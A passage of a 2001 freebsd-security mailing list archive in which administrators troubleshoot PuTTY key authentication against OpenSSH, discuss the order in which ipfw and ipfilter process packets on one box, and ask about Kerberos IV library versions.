sshd[15696]: debug1: got kexinit: Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: Oct 25 14:18:14 strawberry sshd[15696]: debug1: first kex follow: 0 Oct 25 14:18:14 strawberry sshd[15696]: debug1: reserved: 0 Oct 25 14:18:14 strawberry sshd[15696]: debug1: done Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: client->server 3des-cbc hmac-sha1 none Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: server->client 3des-cbc hmac-sha1 none Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_KEXDH_INIT. Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 521/1024 Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 497/1024 Oct 25 14:18:14 strawberry sshd[15696]: debug1: sig size 20 20 Oct 25 14:18:14 strawberry sshd[15696]: debug1: send SSH2_MSG_NEWKEYS. Oct 25 14:18:14 strawberry sshd[15696]: debug1: done: send SSH2_MSG_NEWKEYS. Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_NEWKEYS. Oct 25 14:18:15 strawberry sshd[15696]: debug1: GOT SSH2_MSG_NEWKEYS. Oct 25 14:18:15 strawberry sshd[15696]: debug1: done: KEX2. Oct 25 14:18:17 strawberry sshd[15696]: fatal: Read from socket failed: Connection reset by peer Oct 25 14:18:17 strawberry sshd[15696]: debug1: Calling cleanup 0x805e72c(0x0) Any pointers would be highly appreciated Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 0:24: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 5835337B403 for ; Fri, 26 Oct 2001 00:24:00 -0700 (PDT) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id LAA08408 for ; Fri, 26 Oct 2001 11:23:58 +0400 (MSD) Date: Fri, 26 Oct 2001 11:23:59 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" X-Priority: 3 (Normal) Message-ID: <1682052180.20011026112359@internethelp.ru> To: freebsd-security@freebsd.org Subject: ipfw and ipf on one box Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all. Has anybody an experience of concurrent work of ipfw and ipfilter on one FreeBSD box? Is it possible? What will be the order of packets processing? If somebody knows an URL where this topic is (or may be) covered, this would be enough. Any help is very good. ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 1:46:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay2.agava.net.ru (ofc.agava.net [213.59.3.194]) by hub.freebsd.org (Postfix) with ESMTP id E70A537B401 for ; Fri, 26 Oct 2001 01:46:51 -0700 (PDT) Received: from hellbell.domain (hellbell.domain [192.168.1.12]) by relay2.agava.net.ru (Postfix) with ESMTP id 073FC66B5F; Fri, 26 Oct 2001 12:46:49 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by hellbell.domain (Postfix) with ESMTP id 207DACCFC; Fri, 26 Oct 2001 12:46:35 +0400 (MSD) Date: Fri, 26 Oct 2001 12:46:35 +0400 (MSD) From: Alexei Zakirov X-X-Sender: To: "Nickolay A.Kritsky" Cc: Subject: Re: ipfw and ipf on one box In-Reply-To: <1682052180.20011026112359@internethelp.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: > Hi all. > > Has anybody an experience of concurrent work of ipfw and ipfilter on > one FreeBSD box? Is it possible? What will be the order of packets yes it's possible. I'm using this combination to get an in-kernel ipf NAT and ipfw working together. As I can see order is following: PKT -> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN *** WBR, Alexei Zakirov (frank@unshadow.net) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 2:58: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id D7C7D37B401 for ; Fri, 26 Oct 2001 02:57:55 -0700 (PDT) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id NAA09363; Fri, 26 Oct 2001 13:57:27 +0400 (MSD) Date: Fri, 26 Oct 2001 13:57:27 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat! (v1.49) Personal Reply-To: "Nickolay A.Kritsky" X-Priority: 3 (Normal) Message-ID: <978337558.20011026135727@internethelp.ru> To: Alexei Zakirov Cc: freebsd-security@freebsd.org Subject: Re[2]: ipfw and ipf on one box In-reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Alexei, Friday, October 26, 2001, 12:46:35 PM, you wrote: AZ> On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: >> Hi all. >> >> Has anybody an experience of concurrent work of ipfw and ipfilter on >> one FreeBSD box? Is it possible? What will be the order of packets AZ> yes it's possible. I'm using this combination to get an in-kernel ipf NAT AZ> and ipfw working together. AZ> As I can see order is following: PKT ->> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT AZ> PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN AZ> *** WBR, Alexei Zakirov (frank@unshadow.net) Thanks a lot, I will try this on my firewall. ;------------------------------------------- ; NKritsky ; SysAdmin InternetHelp.Ru ; http://www.internethelp.ru ; mailto:nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 7:23:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from SRDMAIL.SINP.MSU.RU (bigking.sinp.msu.ru [213.131.9.130]) by hub.freebsd.org (Postfix) with ESMTP id 45D5C37B405 for ; Fri, 26 Oct 2001 07:23:20 -0700 (PDT) Received: from [194.220.213.239] (helo=sinp.msu.ru) by SRDMAIL.SINP.MSU.RU with esmtp (Exim 3.33 #3) id 15x7wo-00095P-00 for freebsd-security@freebsd.org; Fri, 26 Oct 2001 18:26:58 +0400 Message-ID: <3BD971D3.4050605@sinp.msu.ru> Date: Fri, 26 Oct 2001 18:23:15 +0400 From: Dmitry Mottl Organization: SINP MSU User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.4) Gecko/20011004 X-Accept-Language: ru, en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Kerberos IV Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi I've just compiled and install the LAST (1.1) version of KerberosIV (kth-krb) from http://www.pdc.kth.se/kth-krb/ After installation I've noticed that shared library has number 2: libkrb.so.2 Why FreeBSD 4.4 ships with libkrb.so.3 ? Is the version of kth-krb in FreeBSD is not the same as the distribution from http://www.pdc.kth.se/kth-krb/ ? Thanks -- Best regards, Dmitry Mottl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 7:44: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from sln.esc.edu (sln.esc.edu [138.116.200.3]) by hub.freebsd.org (Postfix) with ESMTP id B4BD337B405 for ; Fri, 26 Oct 2001 07:43:58 -0700 (PDT) To: "Tom Beer" Cc: security@FreeBSD.ORG Subject: Re: Putty & SSH X-Mailer: Lotus Notes Release 5.0.2c February 2, 2000 Message-ID: From: Bill.Melvin@esc.edu Date: Fri, 26 Oct 2001 10:39:52 -0400 X-MIMETrack: Serialize by Router on sln.esc.edu/SUNY(Release 5.0.2c |February 2, 2000) at 10/26/2001 10:42:38 AM, Serialize complete at 10/26/2001 10:42:38 AM MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I try to connect from my M$ to a Freebsd Box using Putty via > SSH. The keys were produced with the normal procedure > under BSD ... user@fbsdbox $ ssh -V SSH Version OpenSSH_2.3.0 ... ^^^^^^^ http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#A.1.2 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 7:49: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (oe50.law9.hotmail.com [64.4.8.22]) by hub.freebsd.org (Postfix) with ESMTP id 8FDD637B408 for ; Fri, 26 Oct 2001 07:49:03 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 26 Oct 2001 07:49:03 -0700 X-Originating-IP: [194.185.80.200] From: "Andrea Di Giovanni" To: "Tom Beer" Cc: References: <006801c15dee$471d80c0$0901a8c0@system> Subject: Re: Putty & SSH Date: Fri, 26 Oct 2001 16:52:45 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Message-ID: X-OriginalArrivalTime: 26 Oct 2001 14:49:03.0468 (UTC) FILETIME=[5AE682C0:01C15E2D] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Tom, I Know that putty has some problem with DSA key Are u trying to use such type of authentication? This will fail! And so u are prompted for password. u can use RSA key instead as suggested in putty home page. Regards, Andrea Di Giovanni ----- Original Message ----- From: "Tom Beer" To: Sent: venerdì 26 ottobre 2001 9.16 Subject: Putty & SSH > Hi, > > I try to connect from my M$ to a Freebsd Box using Putty via > SSH. The keys were produced with the normal procedure > under BSD. However, it is not possible to connect without entering > a user name and password. This fails, cause I only want to connect > via the ssh key and configured sshd in that way. The log on BSD reads as > follows: > > Oct 25 14:18:14 strawberry sshd[158]: debug1: Forked child 15696. > Oct 25 14:18:14 strawberry sshd[15696]: Connection from laptop.system port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: Connection from 192.168.1.9 port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Client protocol version 2.0; > client software version PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: debug1: no match: PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: Enabling compatibility mode for > protocol 2.0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Local version string > SSH-2.0-OpenSSH_2.3.0 green@FreeBSD.org 20010321 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: wait KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > diffie-hellman-group1-sha1 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: ssh-dss > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: first kex follow: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: reserved: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: client->server 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: server->client 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_KEXDH_INIT. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 521/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 497/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: sig size 20 20 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: GOT SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: done: KEX2. > Oct 25 14:18:17 strawberry sshd[15696]: fatal: Read from socket failed: > Connection reset by peer > Oct 25 14:18:17 strawberry sshd[15696]: debug1: Calling cleanup > 0x805e72c(0x0) > > Any pointers would be highly appreciated Tom > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8: 5:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id 8829037B409 for ; Fri, 26 Oct 2001 08:05:09 -0700 (PDT) Received: (from root@localhost) by mail.wlcg.com (8.11.6/8.11.6) id f9QF59F48571; Fri, 26 Oct 2001 11:05:09 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.6/8.11.6) with ESMTP id f9QF55t48561; Fri, 26 Oct 2001 11:05:06 -0400 (EDT) (envelope-from rsimmons@wlcg.com) X-Authentication-Warning: mail.wlcg.com: rsimmons owned process doing -bs Date: Fri, 26 Oct 2001 11:05:02 -0400 (EDT) From: Rob Simmons To: Alexei Zakirov Cc: "Nickolay A.Kritsky" , Subject: Re: ipfw and ipf on one box In-Reply-To: Message-ID: <20011026110215.O88733-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Has anyone had any luck getting dummynet to work with ipfilter? In LINT it mentions that you need IPFIREWALL with dummynet. Can IPFILTER be substituted? Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 26 Oct 2001, Alexei Zakirov wrote: > On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: > > > Hi all. > > > > Has anybody an experience of concurrent work of ipfw and ipfilter on > > one FreeBSD box? Is it possible? What will be the order of packets > > yes it's possible. I'm using this combination to get an in-kernel ipf NAT > and ipfw working together. > > As I can see order is following: > PKT -> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT > > PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN > > *** WBR, Alexei Zakirov (frank@unshadow.net) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE72Xuhv8Bofna59hYRA9ijAJ0aGDGrMsvh9jnRmkbnQTnlwvSRawCeJ6r0 XLAzRWBJerVjsqsyKCjYJq4= =YhIH -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8: 7:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 524AD37B405 for ; Fri, 26 Oct 2001 08:07:08 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QF5rq09844 for ; Fri, 26 Oct 2001 11:05:53 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QF77p07761 for security@FreeBSD.ORG; Fri, 26 Oct 2001 11:07:07 -0400 Date: Fri, 26 Oct 2001 11:07:07 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026110707.B7631@corona.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from Bill.Melvin@esc.edu on Fri, Oct 26, 2001 at 10:39:52AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 10:39:52AM -0400, Bill.Melvin@esc.edu wrote: > > I try to connect from my M$ to a Freebsd Box using Putty via > > SSH. The keys were produced with the normal procedure > > under BSD ... > > user@fbsdbox $ ssh -V > SSH Version OpenSSH_2.3.0 ... > ^^^^^^^ > > http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#A.1.2 > Yes, but one can convert the keys in the SECSH Public Key Format using ssh-keygen -e private-or-public-OpenSSH-key-file-name >file.pub The conversion from SECSH (SSH2 compatible) format to OpenSSH is done with ssh-keygen -i private-SECSH-key-file-name >private-file ssh-keygen -i public-SECSH-key-file-name >file.pub I successfully imported the keys from the commercial SSH2 on an AIX machine and exported my public OpenSSH key to that AIX machine. Now, will that help putty I've no idea. I do not use Windows for anything except DVD movies. :-) Notice also OpenSSH keeps all authorized keys in a file authorized_keys [authorized_keys2 is deprecated and read only since version 2.9.9], while the commercial SSH2 uses a file called authorization which has the content: key file.pub ... Again, how this works in putty I do not know, but if it's reasonable to suppose it works similar. Isn't it? -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:13:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 53CB637B406 for ; Fri, 26 Oct 2001 08:13:18 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QFC3q09925 for ; Fri, 26 Oct 2001 11:12:03 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QFDH307775 for security@FreeBSD.ORG; Fri, 26 Oct 2001 11:13:17 -0400 Date: Fri, 26 Oct 2001 11:13:17 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026111311.C7631@corona.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: <20011026110707.B7631@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026110707.B7631@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 11:07:07AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 11:07:07AM -0400, Zvezdan Petkovic wrote: > On Fri, Oct 26, 2001 at 10:39:52AM -0400, Bill.Melvin@esc.edu wrote: > > > I try to connect from my M$ to a Freebsd Box using Putty via > > > SSH. The keys were produced with the normal procedure > > > under BSD ... > > > > user@fbsdbox $ ssh -V > > SSH Version OpenSSH_2.3.0 ... > > ^^^^^^^ > > > > http://www.chiark.greenend.org.uk/~sgtatham/putty/faq.html#A.1.2 > > > > Yes, but one can convert the keys in the SECSH Public Key Format using > > ssh-keygen -e private-or-public-OpenSSH-key-file-name >file.pub > > > > Now, will that help putty I've no idea. Ooops! I've just checked that web site more carefully and realised that putty is a beast of a totally different sort. I "like" his explanation that neither OpenSSH not SSH2 formats are particularly pleasant so he uses his own. Does he at least support SECSH proposed standard, in which case my suggestion above might be helpful? Otherwise, bad luck. -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:20:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id B5CEB37B407 for ; Fri, 26 Oct 2001 08:20:17 -0700 (PDT) Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by cactus.fi.uba.ar (8.11.6/8.11.6) with ESMTP id f9QFHVs11444; Fri, 26 Oct 2001 12:17:37 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Fri, 26 Oct 2001 12:17:31 -0300 (ART) From: Fernando Gleiser To: Rob Simmons Cc: Subject: Re: ipfw and ipf on one box In-Reply-To: <20011026110215.O88733-100000@mail.wlcg.com> Message-ID: <20011026121235.A10039-100000@cactus.fi.uba.ar> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 26 Oct 2001, Rob Simmons wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > Has anyone had any luck getting dummynet to work with ipfilter? In LINT > it mentions that you need IPFIREWALL with dummynet. Can IPFILTER be > substituted? I am using dummynet and ipfilter together. I add "options IPFIREWALL", "options IPFIREWALL_DEFAULT_TO_ACCEPT" and "options DUMMYNET" in the kernel config and load ipl.ko to use the KLD version of IP Filter. Note this should work with the in kernel version too. That way, you use dummynet for traffic shaping and ipf for NAT/Filtering. Fer > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Fri, 26 Oct 2001, Alexei Zakirov wrote: > > > On Fri, 26 Oct 2001, Nickolay A.Kritsky wrote: > > > > > Hi all. > > > > > > Has anybody an experience of concurrent work of ipfw and ipfilter on > > > one FreeBSD box? Is it possible? What will be the order of packets > > > > yes it's possible. I'm using this combination to get an in-kernel ipf NAT > > and ipfw working together. > > > > As I can see order is following: > > PKT -> (ipnat) -> (ipfilter) -> (ipfw) -> (bpf) -> INTERFACE OUT > > > > PKT <- (ipfw) <- (ipf) <- (ipnat) <- (bpf) <- INTERFACE IN > > > > *** WBR, Alexei Zakirov (frank@unshadow.net) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.6 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE72Xuhv8Bofna59hYRA9ijAJ0aGDGrMsvh9jnRmkbnQTnlwvSRawCeJ6r0 > XLAzRWBJerVjsqsyKCjYJq4= > =YhIH > -----END PGP SIGNATURE----- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:21:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from shikima.mine.nu (pc1-card3-0-cust143.cdf.cable.ntl.com [62.252.49.143]) by hub.freebsd.org (Postfix) with ESMTP id B33AE37B401 for ; Fri, 26 Oct 2001 08:21:12 -0700 (PDT) Received: from rasputin by shikima.mine.nu with local (Exim 3.33 #1) id 15x8o7-0005KB-00 for security@freebsd.org; Fri, 26 Oct 2001 16:22:03 +0100 Date: Fri, 26 Oct 2001 16:22:03 +0100 From: Rasputin To: security@freebsd.org Subject: Re: Putty & SSH Message-ID: <20011026162203.A20432@shikima.mine.nu> Reply-To: Rasputin References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026111311.C7631@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 11:13:17AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Zvezdan Petkovic [011026 16:15]: > > Now, will that help putty I've no idea. > Ooops! I've just checked that web site more carefully and realised that > putty is a beast of a totally different sort. I "like" his explanation > that neither OpenSSH not SSH2 formats are particularly pleasant so he > uses his own. Does he at least support SECSH proposed standard, in which > case my suggestion above might be helpful? Otherwise, bad luck. If you just want to save yourself a lot of greif, try teraterm with the ttssh plugin - see: http://www.zip.com.au/~roca/ttssh.html Not sure if it's any better, but it's a free 5 minute download to find out :) -- It is one of the superstitions of the human mind to have imagined that virginity could be a virtue. -- Voltaire Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:31:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 5187137B405 for ; Fri, 26 Oct 2001 08:31:15 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QFU0q10185 for ; Fri, 26 Oct 2001 11:30:00 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QFVE607858 for security@FreeBSD.ORG; Fri, 26 Oct 2001 11:31:14 -0400 Date: Fri, 26 Oct 2001 11:31:14 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026113108.A7849@corona.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026162203.A20432@shikima.mine.nu>; from rasputin@submonkey.net on Fri, Oct 26, 2001 at 04:22:03PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 04:22:03PM +0100, Rasputin wrote: > If you just want to save yourself a lot of greif, try teraterm > with the ttssh plugin - see: I save myself grief by not using Windows :-) -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:41:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatehouse.quadtelecom.com (ool-18bd6caa.dyn.optonline.net [24.189.108.170]) by hub.freebsd.org (Postfix) with SMTP id 7B2E037B401 for ; Fri, 26 Oct 2001 08:41:36 -0700 (PDT) Received: (qmail 56038 invoked from network); 26 Oct 2001 15:28:00 -0000 Received: from 201.baltimore-02rh16rt.md.dial-access.att.net (HELO quadtelecom.com) (12.79.107.201) by 26.mumf.nyrk.nycenycp.dsl.att.net with SMTP; 26 Oct 2001 15:28:00 -0000 Message-ID: <3BD980FF.389F5842@quadtelecom.com> Date: 